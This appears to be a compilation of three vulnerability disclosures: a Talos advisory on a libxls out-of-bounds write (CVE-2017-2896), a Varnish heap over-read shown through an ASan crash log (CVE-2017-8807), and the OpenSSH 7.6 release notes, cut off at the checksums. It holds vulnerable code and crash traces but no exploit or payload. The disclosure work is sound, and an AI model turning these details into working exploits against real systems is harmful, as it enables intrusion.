An exploitable out-of-bounds write vulnerability exists in the xls_mergedCells function of libxls 1.4. . A specially crafted XLS file can cause a memory corruption resulting in remote code execution. An attacker can send malicious XLS file to trigger this vulnerability.

**Summary**

An exploitable out-of-bounds write vulnerability exists in the xls\_mergedCells function of libxls 1.4. A specially crafted XLS file can cause a memory corruption resulting in remote code execution. An attacker can send malicious xls file to trigger this vulnerability.

**Tested Versions**

libxls 1.4 readxl package 1.0.0 for R (tested using Microsoft R 4.3.1)

**Product URLs**

http://libxls.sourceforge.net/

**CVSSv3 Score**

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-787: Out-of-bounds Write

**Details**

libxls is a C library supported on Windows, Mac and Linux which can read Microsoft Excel File Format (XLS) files. The library is used by the readxl package that can be installed in the R programming language. An out-of-bounds write appears in the xls\_mergedCells function. Let’s take a look at the vulnerable code:

    Line 606	void xls_mergedCells(xlsWorkSheet* pWS,BOF* bof,BYTE* buf)
    Line 607	{
    Line 608		int count=*((WORD*)buf);
    Line 609		int i,c,r;
    Line 610		struct MERGEDCELLS* span;
    Line 611		verbose("Merged Cells");
    Line 612		for (i=0;i<count;i++)
    Line 613		{
    Line 614			span=(struct MERGEDCELLS*)(buf+(2+i*sizeof(struct MERGEDCELLS)));
    Line 615			//		printf("Merged Cells: [%i,%i] [%i,%i] \n",span->colf,span->rowf,span->coll,span->rowl);
    Line 616			for (r=span->rowf;r<=span->rowl;r++)
    Line 617				for (c=span->colf;c<=span->coll;c++)
    Line 618					pWS->rows.row[r].cells.cell[c].ishiden=1;
    Line 619			pWS->rows.row[span->rowf].cells.cell[span->colf].colspan=(span->coll-span->colf+1);
    Line 620			pWS->rows.row[span->rowf].cells.cell[span->colf].rowspan=(span->rowl-span->rowf+1);
    Line 621			pWS->rows.row[span->rowf].cells.cell[span->colf].ishiden=0;
    Line 622		}
    Line 623	}	
    

Important variables and especially their content are: buf and bof which have been read in raw form from a file. We see at line 612 that the count value, which is exactly bof.size, controls a loop. Next further parts of the buf buffer are pointed to by the span variable at line 614. Because the span structure is based on data directly read from file, an attacker not only fully controls the amount of executions of the for loops at lines 616 and 617 but also the offsets during writes to the pWs->rows structure. Using our PoC we can observe the following values during a crash:

    Starting program: /home/icewall/bugs/libxls-1.4.0/build/bin/xls2csv ./crashes/49a5608059427ce2f2c479e33c5e3ae4
    
    Program received signal SIGSEGV, Segmentation fault.
    0x00007ffff7bd1e57 in xls_mergedCells (pWS=0x605830, bof=0x7fffffffdc10, buf=0x607230 "\b") at xls.c:619
    619             pWS->rows.row[span->rowf].cells.cell[span->colf].colspan=(span->coll-span->colf+1);
    (gdb) p/x *span
    $1 = {rowf = 0xabcd, rowl = 0x1122, colf = 0x3344, coll = 0x6655}
    (gdb) p/x *pWS->rows.row
    $3 = {index = 0x0, fcell = 0x0, lcell = 0x0, height = 0x0, flags = 0x0, xf = 0x0, xfflags = 0x0, cells = {count = 0x0, cell = 0x607280}}
    

MergedCell record starts at offset : 7ED4Ch And has form : \[BOF\]\[SPAN\]\[SPAN\]…BOF.size\*sizeof(MERGEDCELLS)…\[SPAN\]

**Crash Information**

Crash in the Microsoft R platform:

    > library(readxl)
    > path <- readxl_example("49a5608059427ce2f2c479e33c5e3ae4.xls")
    > lapply(excel_sheets(path), read_excel, path = path)
    fread: wanted 1 got 0 loc=519168
    fread: wanted 1 got 0 loc=519168
    fread: wanted 1 got 0 loc=519168
    fread: wanted 1 got 0 loc=519168
    fread: wanted 1 got 0 loc=519168
    fread: wanted 1 got 0 loc=519168
    fread: wanted 1 got 0 loc=519168
    fread: wanted 1 got 0 loc=519168
    fread: wanted 1 got 0 loc=519168
    fread: wanted 1 got 0 loc=519168
    fread: wanted 1 got 0 loc=519168
    
     *** caught segfault ***
    address 0x54, cause 'memory not mapped'
    
    Traceback:
     1: .Call("readxl_read_xls_", PACKAGE = "readxl", path, sheet_i,     limits, shim, col_names, col_types, na, trim_ws, guess_max)
     2: read_fun(path = path, sheet = sheet, limits = limits, shim = shim,     col_names = col_names, col_types = col_types, na = na, trim_ws = trim_ws,     guess_max = guess_max)
     3: tibble::as_tibble(read_fun(path = path, sheet = sheet, limits = limits,     shim = shim, col_names = col_names, col_types = col_types,     na = na, trim_ws = trim_ws, 
            guess_max = guess_max), validate = FALSE)
     4: tibble::repair_names(tibble::as_tibble(read_fun(path = path,     sheet = sheet, limits = limits, shim = shim, col_names = col_names,     col_types = col_types, na = na,
            trim_ws = trim_ws, guess_max = guess_max),     validate = FALSE), prefix = "X", sep = "__")
     5: read_excel_(path = path, sheet = sheet, range = range, col_names = col_names,     col_types = col_types, na = na, trim_ws = trim_ws, skip = skip,     n_max = n_max, guess_max 
            = guess_max, excel_format(path))
     6: FUN(X[[i]], ...)
     7: lapply(excel_sheets(path), read_excel, path = path)
    
    
        directly in libxls lib:
    
    ==70269== Memcheck, a memory error detector
    ==70269== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.
    ==70269== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info
    ==70269== Command: ./xls2csv ./crashes/49a5608059427ce2f2c479e33c5e3ae4
    ==70269== 
    ==70269== Invalid write of size 1
    ==70269==    at 0x4C3106F: strcpy (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
    ==70269==    by 0x4E42F05: xls_open (xls.c:927)
    ==70269==    by 0x400956: main (xls2csv.c:45)
    ==70269==  Address 0x5425415 is 0 bytes after a block of size 21 alloc'd
    ==70269==    at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
    ==70269==    by 0x4E42EE3: xls_open (xls.c:926)
    ==70269==    by 0x400956: main (xls2csv.c:45)
    ==70269== 
    ==70269== Invalid read of size 8
    ==70269==    at 0x4E41E57: xls_mergedCells (xls.c:619)
    ==70269==    by 0x4E42CBC: xls_parseWorkSheet (xls.c:861)
    ==70269==    by 0x400AEC: main (xls2csv.c:90)
    ==70269==  Address 0x55e8b66 is 1,095,926 bytes inside an unallocated block of size 3,358,064 in arena "client"
    ==70269== 
    ==70269== Invalid write of size 2
    ==70269==    at 0x4E41E92: xls_mergedCells (xls.c:619)
    ==70269==    by 0x4E42CBC: xls_parseWorkSheet (xls.c:861)
    ==70269==    by 0x400AEC: main (xls2csv.c:90)
    ==70269==  Address 0x7cf7f is not stack'd, malloc'd or (recently) free'd
    

**Timeline**

2017-08-29 - Vendor Disclosure  
2017-11-14 - Public Release

Discovered by Marcin 'Icewall' Noga of Cisco Talos.

CVE-2017-2896: TALOS-2017-0403 || Cisco Talos Intelligence Group

vbf_stp_error in bin/varnishd/cache/cache_fetch.c in Varnish HTTP Cache 4.1.x before 4.1.9 and 5.x before 5.2.1 allows remote attackers to obtain sensitive information from process memory because a VFP_GetStorage buffer is larger than intended in certain circumstances involving -sfile Stevedore transient objects.

Test output (panic only):

    ***  v1    0.9 debug|Info: Child (14386) said =================================================================
    ***  v1    0.9 debug|Info: Child (14386) said ==14386==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009b00 at pc 0x000108f3d2f8 bp 0x700002632c30 sp 0x7000026323e0
    ***  v1    0.9 debug|Info: Child (14386) said READ of size 4096 at 0x602000009b00 thread T12
    ***  v1    1.0 debug|Info: Child (14386) said     #0 0x108f3d2f7 in __asan_memcpy (libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x4d2f7)
    ***  v1    1.2 debug|Info: Child (14386) said     #1 0x1082542ab in vbf_stp_error cache_fetch.c:902
    ***  v1    1.2 debug|Info: Child (14386) said     #2 0x10822f81f in vbf_fetch_thread steps.h:58
    ***  v1    1.2 debug|Info: Child (14386) said     #3 0x1083fef58 in Pool_Work_Thread cache_wrk.c:375
    ***  v1    1.2 debug|Info: Child (14386) said     #4 0x1083fa276 in WRK_Thread cache_wrk.c:128
    ***  v1    1.2 debug|Info: Child (14386) said     #5 0x1083f94f0 in pool_thread cache_wrk.c:406
    ***  v1    1.2 debug|Info: Child (14386) said     #6 0x7fff9da9693a in _pthread_body (libsystem_pthread.dylib:x86_64+0x393a)
    ***  v1    1.2 debug|Info: Child (14386) said     #7 0x7fff9da96886 in _pthread_start (libsystem_pthread.dylib:x86_64+0x3886)
    ***  v1    1.2 debug|Info: Child (14386) said     #8 0x7fff9da9608c in thread_start (libsystem_pthread.dylib:x86_64+0x308c)
    ***  v1    1.2 debug|Info: Child (14386) said 
    ***  v1    1.2 debug|Info: Child (14386) said 0x602000009b00 is located 0 bytes to the right of 16-byte region [0x602000009af0,0x602000009b00)
    ***  v1    1.2 debug|Info: Child (14386) said allocated by thread T12 here:
    ***  v1    1.2 debug|Info: Child (14386) said     #0 0x108f4618c in wrap_malloc (libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x5618c)
    ***  v1    1.2 debug|Info: Child (14386) said     #1 0x10865a461 in VSB_newbuf vsb.c:201
    ***  v1    1.2 debug|Info: Child (14386) said     #2 0x108659920 in VSB_new vsb.c:229
    ***  v1    1.2 debug|Info: Child (14386) said     #3 0x108252a55 in vbf_stp_error cache_fetch.c:862
    ***  v1    1.2 debug|Info: Child (14386) said     #4 0x10822f81f in vbf_fetch_thread steps.h:58
    ***  v1    1.2 debug|Info: Child (14386) said     #5 0x1083fef58 in Pool_Work_Thread cache_wrk.c:375
    ***  v1    1.2 debug|Info: Child (14386) said     #6 0x1083fa276 in WRK_Thread cache_wrk.c:128
    ***  v1    1.2 debug|Info: Child (14386) said     #7 0x1083f94f0 in pool_thread cache_wrk.c:406
    ***  v1    1.2 debug|Info: Child (14386) said     #8 0x7fff9da9693a in _pthread_body (libsystem_pthread.dylib:x86_64+0x393a)
    ***  v1    1.2 debug|Info: Child (14386) said     #9 0x7fff9da96886 in _pthread_start (libsystem_pthread.dylib:x86_64+0x3886)
    ***  v1    1.2 debug|Info: Child (14386) said     #10 0x7fff9da9608c in thread_start (libsystem_pthread.dylib:x86_64+0x308c)
    ***  v1    1.2 debug|Info: Child (14386) said 
    ***  v1    1.2 debug|Info: Child (14386) said Thread T12 created by T4 here:
    ***  v1    1.2 debug|Info: Child (14386) said     #0 0x108f3cca6 in wrap_pthread_create (libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x4cca6)
    ***  v1    1.2 debug|Info: Child (14386) said     #1 0x1083f7bc4 in pool_breed cache_wrk.c:431
    ***  v1    1.2 debug|Info: Child (14386) said     #2 0x1083f3052 in pool_herder cache_wrk.c:490
    ***  v1    1.2 debug|Info: Child (14386) said     #3 0x7fff9da9693a in _pthread_body (libsystem_pthread.dylib:x86_64+0x393a)
    ***  v1    1.2 debug|Info: Child (14386) said     #4 0x7fff9da96886 in _pthread_start (libsystem_pthread.dylib:x86_64+0x3886)
    ***  v1    1.2 debug|Info: Child (14386) said     #5 0x7fff9da9608c in thread_start (libsystem_pthread.dylib:x86_64+0x308c)
    ***  v1    1.2 debug|Info: Child (14386) said 
    ***  v1    1.2 debug|Info: Child (14386) said Thread T4 created by T3 here:
    ***  v1    1.2 debug|Info: Child (14386) said     #0 0x108f3cca6 in wrap_pthread_create (libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x4cca6)
    ***  v1    1.2 debug|Info: Child (14386) said     #1 0x10830c143 in pool_mkpool cache_pool.c:162
    ***  v1    1.2 debug|Info: Child (14386) said     #2 0x108306f84 in pool_poolherder cache_pool.c:196
    ***  v1    1.2 debug|Info: Child (14386) said     #3 0x7fff9da9693a in _pthread_body (libsystem_pthread.dylib:x86_64+0x393a)
    ***  v1    1.2 debug|Info: Child (14386) said     #4 0x7fff9da96886 in _pthread_start (libsystem_pthread.dylib:x86_64+0x3886)
    ***  v1    1.2 debug|Info: Child (14386) said     #5 0x7fff9da9608c in thread_start (libsystem_pthread.dylib:x86_64+0x308c)
    ***  v1    1.2 debug|Info: Child (14386) said 
    ***  v1    1.2 debug|Info: Child (14386) said Thread T3 created by T0 here:
    ***  v1    1.2 debug|Info: Child (14386) said     #0 0x108f3cca6 in wrap_pthread_create (libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x4cca6)
    ***  v1    1.2 debug|Info: Child (14386) said     #1 0x108306b6a in Pool_Init cache_pool.c:255
    ***  v1    1.2 debug|Info: Child (14386) said     #2 0x1082d10f2 in child_main cache_main.c:260
    ***  v1    1.2 debug|Info: Child (14386) said     #3 0x1084e0347 in mgt_launch_child mgt_child.c:399
    ***  v1    1.2 debug|Info: Child (14386) said     #4 0x1084e3e87 in mch_cli_server_start mgt_child.c:665
    ***  v1    1.2 debug|Info: Child (14386) said     #5 0x10863490f in cls_dispatch vcli_serve.c:229
    ***  v1    1.2 debug|Info: Child (14386) said     #6 0x1086324f7 in cls_vlu2 vcli_serve.c:289
    ***  v1    1.2 debug|Info: Child (14386) said     #7 0x108620290 in cls_vlu vcli_serve.c:364
    ***  v1    1.2 debug|Info: Child (14386) said     #8 0x10864b742 in LineUpProcess vlu.c:98
    ***  v1    1.2 debug|Info: Child (14386) said     #9 0x10864ad92 in VLU_Fd vlu.c:123
    ***  v1    1.2 debug|Info: Child (14386) said     #10 0x10862a5d9 in VCLS_PollFd vcli_serve.c:554
    ***  v1    1.2 debug|Info: Child (14386) said     #11 0x1084e7e31 in mgt_cli_callback2 mgt_cli.c:397
    ***  v1    1.2 debug|Info: Child (14386) said     #12 0x10863f33e in vev_schedule_one vev.c:450
    ***  v1    1.2 debug|Info: Child (14386) said     #13 0x10863d01b in vev_schedule vev.c:344
    ***  v1    1.2 debug|Info: Child (14386) said     #14 0x1084fdd4b in main mgt_main.c:929
    ***  v1    1.2 debug|Info: Child (14386) said     #15 0x7fff9d87d234 in start (libdyld.dylib:x86_64+0x5234)
    ***  v1    1.2 debug|Info: Child (14386) said 
    ***  v1    1.2 debug|Info: Child (14386) said SUMMARY: AddressSanitizer: heap-buffer-overflow (libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x4d2f7) in __asan_memcpy
    ***  v1    1.2 debug|Info: Child (14386) said Shadow bytes around the buggy address:
    ***  v1    1.2 debug|Info: Child (14386) said   0x1c0400001310: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    ***  v1    1.2 debug|Info: Child (14386) said   0x1c0400001320: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    ***  v1    1.2 debug|Info: Child (14386) said   0x1c0400001330: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    ***  v1    1.2 debug|Info: Child (14386) said   0x1c0400001340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    ***  v1    1.2 debug|Info: Child (14386) said   0x1c0400001350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa 00 00
    ***  v1    1.2 debug|Info: Child (14386) said =>0x1c0400001360:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    ***  v1    1.2 debug|Info: Child (14386) said   0x1c0400001370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    ***  v1    1.2 debug|Info: Child (14386) said   0x1c0400001380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    ***  v1    1.2 debug|Info: Child (14386) said   0x1c0400001390: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    ***  v1    1.2 debug|Info: Child (14386) said   0x1c04000013a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    ***  v1    1.2 debug|Info: Child (14386) said   0x1c04000013b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    ***  v1    1.2 debug|Info: Child (14386) said Shadow byte legend (one shadow byte represents 8 application bytes):
    ***  v1    1.2 debug|Info: Child (14386) said   Addressable:           00
    ***  v1    1.2 debug|Info: Child (14386) said   Partially addressable: 01 02 03 04 05 06 07 
    ***  v1    1.2 debug|Info: Child (14386) said   Heap left redzone:       fa
    ***  v1    1.2 debug|Info: Child (14386) said   Freed heap region:       fd
    ***  v1    1.2 debug|Info: Child (14386) said   Stack left redzone:      f1
    ***  v1    1.2 debug|Info: Child (14386) said   Stack mid redzone:       f2
    ***  v1    1.2 debug|Info: Child (14386) said   Stack right redzone:     f3
    ***  v1    1.2 debug|Info: Child (14386) said   Stack after return:      f5
    ***  v1    1.2 debug|Info: Child (14386) said   Stack use after scope:   f8
    ***  v1    1.2 debug|Info: Child (14386) said   Global redzone:          f9
    ***  v1    1.2 debug|Info: Child (14386) said   Global init order:       f6
    ***  v1    1.2 debug|Info: Child (14386) said   Poisoned by user:        f7
    ***  v1    1.2 debug|Info: Child (14386) said   Container overflow:      fc
    ***  v1    1.2 debug|Info: Child (14386) said   Array cookie:            ac
    ***  v1    1.2 debug|Info: Child (14386) said   Intra object redzone:    bb
    ***  v1    1.2 debug|Info: Child (14386) said   ASan internal:           fe
    ***  v1    1.2 debug|Info: Child (14386) said   Left alloca redzone:     ca
    ***  v1    1.2 debug|Info: Child (14386) said   Right alloca redzone:    cb
    ***  v1    1.2 debug|Info: Child (14386) said ==14386==ABORTING
    ---- c1    1.2 HTTP rx EOF (fd:15 read: Undefined error: 0) 1
    *    top   1.2 RESETTING after a.vtc
    **   v1    1.2 Wait
    **** v1    1.2 CLI TX|panic.clear
    ***  v1    1.2 debug|Error: Child (14386) died signal=6
    ***  v1    1.2 debug|Error: Child (14386) Panic at: Mon, 18 Sep 2017 11:24:07 GMT
    ***  v1    1.2 debug|Wrong turn at mgt/mgt_child.c:287:
    ***  v1    1.2 debug|Signal 6 (Abort trap: 6) received at 0x7fff9d9abd42 si_code 0
    ***  v1    1.2 debug|version = varnish-trunk revision 8e0b7b204, vrt api = 6.1
    ***  v1    1.2 debug|ident = Darwin,16.7.0,x86_64,-jnone,-sfile,-smalloc,-hcritbit,kqueue
    ***  v1    1.2 debug|now = 426422.783616 (mono), 1505733847.909924 (real)
    ***  v1    1.2 debug|Backtrace:
    ***  v1    1.2 debug|  0x1082f5c59: 0   varnishd                            0x00000001082f5c59 pan_backtrace + 361
    ***  v1    1.2 debug|  0x1082f5875: 0   varnishd                            0x00000001082f5875 pan_ic + 1525
    ***  v1    1.2 debug|  0x10861189b: 0   varnishd                            0x000000010861189b VAS_Fail + 379
    ***  v1    1.2 debug|  0x1084e3928: 0   varnishd                            0x00000001084e3928 child_signal_handler + 1272
    ***  v1    1.2 debug|  0x7fff9da8cb3a: 0   libsystem_platform.dylib            0x00007fff9da8cb3a _sigtramp + 26
    ***  v1    1.2 debug|  0x7000026323e0: 0   ???                                 0x00007000026323e0 0x0 + 123145342362592
    ***  v1    1.2 debug|  0x7fff9d911420: 0   libsystem_c.dylib                   0x00007fff9d911420 abort + 129
    ***  v1    1.2 debug|  0x108f68996: 0   libclang_rt.asan_osx_dynamic.dylib  0x0000000108f68996 _ZN11__sanitizer5AbortEv + 70
    ***  v1    1.2 debug|  0x108f64268: 0   libclang_rt.asan_osx_dynamic.dylib  0x0000000108f64268 _ZN11__sanitizer3DieEv + 120
    ***  v1    1.2 debug|  0x108f4b207: 0   libclang_rt.asan_osx_dynamic.dylib  0x0000000108f4b207 _ZN6__asan19ScopedInErrorReportD2Ev + 311
    ***  v1    1.2 debug|errno = 25 (Inappropriate ioctl for device)
    ***  v1    1.2 debug|thread = (cache-worker)
    ***  v1    1.2 debug|thr.req = 0x0 {
    ***  v1    1.2 debug|},
    ***  v1    1.2 debug|thr.busyobj = 0x631000050820 {
    ***  v1    1.2 debug|  ws = 0x6310000508a0 {
    ***  v1    1.2 debug|    id = \"bo\",
    ***  v1    1.2 debug|    {s, f, r, e} = {0x631000052760, +264, 0x0, +57496},
    ***  v1    1.2 debug|  },
    ***  v1    1.2 debug|  retries = 0, failed = 0, flags = {do_stream},
    ***  v1    1.2 debug|  director_req = 0x61200000b378 {
    ***  v1    1.2 debug|    vcl_name = default,
    ***  v1    1.2 debug|    type = backend {
    ***  v1    1.2 debug|      display_name = vcl1.default,
    ***  v1    1.2 debug|      ipv4 = 192.0.2.255,
    ***  v1    1.2 debug|      port = 80,
    ***  v1    1.2 debug|      hosthdr = 192.0.2.255,
    ***  v1    1.2 debug|      health = healthy,
    ***  v1    1.2 debug|      admin_health = probe, changed = 1505733847.432227,
    ***  v1    1.2 debug|      n_conn = 0,
    ***  v1    1.2 debug|    },
    ***  v1    1.2 debug|  },
    ***  v1    1.2 debug|  director_resp = director_req,
    ***  v1    1.2 debug|  http[bereq] = 0x631000050e70 {
    ***  v1    1.2 debug|    ws = 0x6310000508a0 {
    ***  v1    1.2 debug|      [Already dumped, see above]
    ***  v1    1.2 debug|    },
    ***  v1    1.2 debug|    hdrs {
    ***  v1    1.2 debug|      \"GET\",
    ***  v1    1.2 debug|      \"/\",
    ***  v1    1.2 debug|      \"HTTP/1.1\",
    ***  v1    1.2 debug|      \"X-Forwarded-For: 127.0.0.1\",
    ***  v1    1.2 debug|      \"Accept-Encoding: gzip\",
    ***  v1    1.2 debug|      \"X-Varnish: 1002\",
    ***  v1    1.2 debug|      \"Host: 192.0.2.255\",
    ***  v1    1.2 debug|    },
    ***  v1    1.2 debug|  },
    ***  v1    1.2 debug|  http[beresp] = 0x6310000512e8 {
    ***  v1    1.2 debug|    ws = 0x6310000508a0 {
    ***  v1    1.2 debug|      [Already dumped, see above]
    ***  v1    1.2 debug|    },
    ***  v1    1.2 debug|    hdrs {
    ***  v1    1.2 debug|      \"HTTP/1.1\",
    ***  v1    1.2 debug|      \"503\",
    ***  v1    1.2 debug|      \"Backend fetch failed\",
    ***  v1    1.2 debug|      \"Date: Mon, 18 Sep 2017 11:24:07 GMT\",
    ***  v1    1.2 debug|      \"Server: Varnish\",
    ***  v1    1.2 debug|    },
    ***  v1    1.2 debug|  },
    ***  v1    1.2 debug|  objcore[fetch] = 0x60e000006be0 {
    ***  v1    1.2 debug|    refcnt = 2,
    ***  v1    1.2 debug|    flags = {busy},
    ***  v1    1.2 debug|    exp_flags = {},
    ***  v1    1.2 debug|    boc = 0x608000007b20 {
    ***  v1    1.2 debug|      refcnt = 2,
    ***  v1    1.2 debug|      state = req_done,
    ***  v1    1.2 debug|      vary = 0x0,
    ***  v1    1.2 debug|      stevedore_priv = 0x0,
    ***  v1    1.2 debug|    },
    ***  v1    1.2 debug|    exp = {1505733847.643175, 120.000000, 0.000000, 0.000000},
    ***  v1    1.2 debug|    objhead = 0x60b0000054d0,
    ***  v1    1.2 debug|    stevedore = 0x60f00000e230 (file foo) {
    ***  v1    1.2 debug|      Simple = 0x10dad6000,
    ***  v1    1.2 debug|      Obj = 0x60d000006438 {priv=0x60d000006430, ptr=0x10dad6000, len=216, space=4096},
    ***  v1    1.2 debug|      LEN = 0x0...0,
    ***  v1    1.2 debug|      VXID = 0x000003ea,
    ***  v1    1.2 debug|      FLAGS = 0x00,
    ***  v1    1.2 debug|      GZIPBITS = 0x0...0,
    ***  v1    1.2 debug|      LASTMODIFIED = 0x41d66feb35c00000,
    ***  v1    1.2 debug|      VARY = {len=0, ptr=0x0},
    ***  v1    1.2 debug|      HEADERS = {len=96, ptr=0x10dad6078},
    ***  v1    1.2 debug|      Body = 0x60d000006368 {priv=0x60d000006360, ptr=0x10dad7000, len=0, space=4096},
    ***  v1    1.2 debug|    },
    ***  v1    1.2 debug|  },
    ***  v1    1.2 debug|  vcl = {
    ***  v1    1.2 debug|    name = \"vcl1\",
    ***  v1    1.2 debug|    busy = 2,
    ***  v1    1.2 debug|    discard = 0,
    ***  v1    1.2 debug|    state = auto,
    ***  v1    1.2 debug|    temp = warm,
    ***  v1    1.2 debug|    conf = {
    ***  v1    1.2 debug|      srcname = {
    ***  v1    1.2 debug|        \"<vcl.inline>\",
    ***  v1    1.2 debug|        \"Builtin\",
    ***  v1    1.2 debug|      },
    ***  v1    1.2 debug|    },
    ***  v1    1.2 debug|  },
    ***  v1    1.2 debug|  vmods = {
    ***  v1    1.2 debug|  },
    ***  v1    1.2 debug|},

CVE-2017-8807: bugfix : coredump causes by memcpy in vbf_stp_error by shamger · Pull Request #2429 · varnishcache/varnish-cache

The process_open function in sftp-server.c in OpenSSH before 7.6 does not properly prevent write operations in readonly mode, which allows attackers to create zero-length files.

OpenSSH 7.6 was released on 2017-10-03. It is available from the mirrors listed at https://www.openssh.com/. OpenSSH is a 100% complete SSH protocol 2.0 implementation and includes sftp client and server support. Once again, we would like to thank the OpenSSH community for their continued support of the project, especially those who contributed code or patches, reported bugs, tested snapshots or donated to the project. More information on donations may be found at: http://www.openssh.com/donations.html Potentially-incompatible changes ================================ This release includes a number of changes that may affect existing configurations: \* ssh(1): delete SSH protocol version 1 support, associated configuration options and documentation. \* ssh(1)/sshd(8): remove support for the hmac-ripemd160 MAC. \* ssh(1)/sshd(8): remove support for the arcfour, blowfish and CAST ciphers. \* Refuse RSA keys <1024 bits in length and improve reporting for keys that do not meet this requirement. \* ssh(1): do not offer CBC ciphers by default. Changes since OpenSSH 7.5 ========================= This is primarily a bugfix release. It also contains substantial internal refactoring. Security -------- \* sftp-server(8): in read-only mode, sftp-server was incorrectly permitting creation of zero-length files. Reported by Michal Zalewski. New Features ------------ \* ssh(1): add RemoteCommand option to specify a command in the ssh config file instead of giving it on the client's command line. This allows the configuration file to specify the command that will be executed on the remote host. \* sshd(8): add ExposeAuthInfo option that enables writing details of the authentication methods used (including public keys where applicable) to a file that is exposed via a $SSH\_USER\_AUTH environment variable in the subsequent session. \* ssh(1): add support for reverse dynamic forwarding. In this mode, ssh will act as a SOCKS4/5 proxy and forward connections to destinations requested by the remote SOCKS client. This mode is requested using extended syntax for the -R and RemoteForward options and, because it is implemented solely at the client, does not require the server be updated to be supported. \* sshd(8): allow LogLevel directive in sshd\_config Match blocks; bz#2717 \* ssh-keygen(1): allow inclusion of arbitrary string or flag certificate extensions and critical options. \* ssh-keygen(1): allow ssh-keygen to use a key held in ssh-agent as a CA when signing certificates. bz#2377 \* ssh(1)/sshd(8): allow IPQoS=none in ssh/sshd to not set an explicit ToS/DSCP value and just use the operating system default. \* ssh-add(1): added -q option to make ssh-add quiet on success. \* ssh(1): expand the StrictHostKeyChecking option with two new settings. The first "accept-new" will automatically accept hitherto-unseen keys but will refuse connections for changed or invalid hostkeys. This is a safer subset of the current behaviour of StrictHostKeyChecking=no. The second setting "off", is a synonym for the current behaviour of StrictHostKeyChecking=no: accept new host keys, and continue connection for hosts with incorrect hostkeys. A future release will change the meaning of StrictHostKeyChecking=no to the behaviour of "accept-new". bz#2400 \* ssh(1): add SyslogFacility option to ssh(1) matching the equivalent option in sshd(8). bz#2705 Bugfixes -------- \* ssh(1): use HostKeyAlias if specified instead of hostname for matching host certificate principal names; bz#2728 \* sftp(1): implement sorting for globbed ls; bz#2649 \* ssh(1): add a user@host prefix to client's "Permission denied" messages, useful in particular when using "stacked" connections (e.g. ssh -J) where it's not clear which host is denying. bz#2720 \* ssh(1): accept unknown EXT\_INFO extension values that contain \\0 characters. These are legal, but would previously cause fatal connection errors if received. \* ssh(1)/sshd(8): repair compression statistics printed at connection exit \* sftp(1): print '?' instead of incorrect link count (that the protocol doesn't provide) for remote listings. bz#2710 \* ssh(1): return failure rather than fatal() for more cases during session multiplexing negotiations. Causes the session to fall back to a non-mux connection if they occur. bz#2707 \* ssh(1): mention that the server may send debug messages to explain public key authentication problems under some circumstances; bz#2709 \* Translate OpenSSL error codes to better report incorrect passphrase errors when loading private keys; bz#2699 \* sshd(8): adjust compatibility patterns for WinSCP to correctly identify versions that implement only the legacy DH group exchange scheme. bz#2748 \* ssh(1): print the "Killed by signal 1" message only at LogLevel verbose so that it is not shown at the default level; prevents it from appearing during ssh -J and equivalent ProxyCommand configs. bz#1906, bz#2744 \* ssh-keygen(1): when generating all hostkeys (ssh-keygen -A), clobber existing keys if they exist but are zero length. zero-length keys could previously be made if ssh-keygen failed or was interrupted part way through generating them. bz#2561 \* ssh(1): fix pledge(2) violation in the escape sequence "~&" used to place the current session in the background. \* ssh-keyscan(1): avoid double-close() on file descriptors; bz#2734 \* sshd(8): avoid reliance on shared use of pointers shared between monitor and child sshd processes. bz#2704 \* sshd\_config(8): document available AuthenticationMethods; bz#2453 \* ssh(1): avoid truncation in some login prompts; bz#2768 \* sshd(8): Fix various compilations failures, inc bz#2767 \* ssh(1): make "--" before the hostname terminate argument processing after the hostname too. \* ssh-keygen(1): switch from aes256-cbc to aes256-ctr for encrypting new-style private keys. Fixes problems related to private key handling for no-OpenSSL builds. bz#2754 \* ssh(1): warn and do not attempt to use keys when the public and private halves do not match. bz#2737 \* sftp(1): don't print verbose error message when ssh disconnects from under sftp. bz#2750 \* sshd(8): fix keepalive scheduling problem: activity on a forwarded port from preventing the keepalive from being sent; bz#2756 \* sshd(8): when started without root privileges, don't require the privilege separation user or path to exist. Makes running the regression tests easier without touching the filesystem. \* Make integrity.sh regression tests more robust against timeouts. bz#2658 \* ssh(1)/sshd(8): correctness fix for channels implementation: accept channel IDs greater than 0x7FFFFFFF. Portability ----------- \* sshd(9): drop two more privileges in the Solaris sandbox: PRIV\_DAX\_ACCESS and PRIV\_SYS\_IB\_INFO; bz#2723 \* sshd(8): expose list of completed authentication methods to PAM via the SSH\_AUTH\_INFO\_0 PAM environment variable. bz#2408 \* ssh(1)/sshd(8): fix several problems in the tun/tap forwarding code, mostly to do with host/network byte order confusion. bz#2735 \* Add --with-cflags-after and --with-ldflags-after configure flags to allow setting CFLAGS/LDFLAGS after configure has completed. These are useful for setting sanitiser/fuzzing options that may interfere with configure's operation. \* sshd(8): avoid Linux seccomp violations on ppc64le over the socketcall syscall. \* Fix use of ldns when using ldns-config; bz#2697 \* configure: set cache variables when cross-compiling. The cross- compiling fallback message was saying it assumed the test passed, but it wasn't actually set the cache variables and this would cause later tests to fail. \* Add clang libFuzzer harnesses for public key parsing and signature verification. Checksums: ========== - SHA1 (openssh-7.6.tar.gz) = 